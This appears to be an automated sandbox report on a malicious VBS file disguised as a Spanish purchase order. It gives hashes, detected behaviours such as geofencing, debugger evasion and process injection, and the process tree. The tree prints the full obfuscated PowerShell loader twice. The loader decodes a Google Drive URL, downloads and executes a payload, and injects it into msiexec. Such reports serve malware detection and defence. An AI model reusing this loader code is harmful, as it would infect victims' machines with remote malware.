Analysis
-
max time kernel
135s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 14:57
Static task
static1
Behavioral task
behavioral1
Sample
Distribuciones Enelca Jaén, S.L. PEDIDO 456799.vbs
Resource
win7-20240708-en
General
-
Target
Distribuciones Enelca Jaén, S.L. PEDIDO 456799.vbs
-
Size
529KB
-
MD5
3f13eef87515d70fbdfedc6de7b6efc4
-
SHA1
8d2394c2e4daada6b8d9af1b60d8d11130ac1845
-
SHA256
a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237
-
SHA512
585541e886e8175def7f0e4d92c2ad39c065f8777a113c8738a2aaade3dc96592572265f1e3511718dcdd0703730d530fa13b88c4773ecd2a2ef181c5886de7a
-
SSDEEP
6144:o0/75XG/Kk33JliXA0PsaaBBWiQP88BNkmxylnwa4j3Ms/+UrJ/WzukhWwP+m55k:BNU3/G6PQU8/xCnv4Y4lWzCwPHtvP9Dg
Malware Config
Signatures
-
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exemsiexec.exeflow pid process 24 5080 powershell.exe 27 5080 powershell.exe 47 1604 msiexec.exe 49 1604 msiexec.exe 52 1604 msiexec.exe 54 1604 msiexec.exe 55 1604 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe -
Processes:
powershell.exepowershell.exepid process 5080 powershell.exe 3780 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid process 1604 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid process 3780 powershell.exe 1604 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 856 1604 WerFault.exe msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 5080 powershell.exe 5080 powershell.exe 3780 powershell.exe 3780 powershell.exe 3780 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 3780 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 5080 powershell.exe Token: SeDebugPrivilege 3780 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 5052 wrote to memory of 5080 5052 WScript.exe powershell.exe PID 5052 wrote to memory of 5080 5052 WScript.exe powershell.exe PID 3780 wrote to memory of 1604 3780 powershell.exe msiexec.exe PID 3780 wrote to memory of 1604 3780 powershell.exe msiexec.exe PID 3780 wrote to memory of 1604 3780 powershell.exe msiexec.exe PID 3780 wrote to memory of 1604 3780 powershell.exe msiexec.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Distribuciones Enelca Jaén, S.L. PEDIDO 456799.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1604 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 18323⤵
- Program crash
PID:856
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1604 -ip 16041⤵PID:228
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
464KB
MD5d43327229caac3f1c1c7443675eaa345
SHA1169d456a6122e6a39603f3017eb16df162aca251
SHA2560144e44b033690c4d3387d5125a5a76003d371ca48116a53d1439f83d6b530d3
SHA512da4cdb914c5618ca83f4f97bf28d89899bc9459ff797b6f865488a7f446b56cea77bbe37aeb2e89fb81937b6fa1929a2e6c9feca5fa2ee32344f21e0dff3a10d